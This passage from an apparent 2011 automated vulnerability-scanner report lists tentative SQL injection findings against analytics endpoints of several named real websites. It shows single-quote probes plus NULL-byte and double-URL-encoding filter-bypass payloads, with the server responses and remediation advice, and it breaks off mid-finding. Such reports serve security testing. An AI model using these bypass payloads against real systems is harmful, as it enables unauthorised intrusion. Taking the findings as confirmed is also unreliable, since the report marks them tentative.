Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.6. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s9749755890574 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s9749755890574

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
xserver: www630
Content-Length: 0
Content-Type: text/html


1.7. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s99864659090526 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s99864659090526

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/ccardsccdc-us/1/H.17/s99864659090526 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
xserver: www404
Content-Length: 0
Content-Type: text/html


1.8. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oimg.nbcuni.com
Path:   /b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 459
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/nbcuglobal, nbcucnbcd, nbcucnbcbu/1/H.2-pdv-2/
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html


1.9. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oimg.nbcuni.com
Path:   /b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.10. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Evidence check: as in 1.9, Response 1 below is Apache's 404 ErrorDocument for the path truncated at the NULL byte (/b/ss/djglobal,djwsj/1), and Response 2 is an empty 404 (Content-Length: 0, xserver: www438). No database error text appears in either, so the differential is a front-end artefact of %00 handling rather than evidence of a failing query; the finding stays unconfirmed until a genuine SQL error or a boolean or time-based difference is shown.

Remediation detail

NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where strings are NUL-terminated: once the WAF percent-decodes %00 into a real 0x00 byte, its C-string matching stops there and never sees the quote that follows, while the application behind it, which carries string lengths explicitly, receives the whole value. You should fix the actual vulnerability within the application code (parameterized queries rather than input filtering), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/djglobal,djwsj/1%00'/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/djglobal,djwsj/1 was not found on this server.<
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

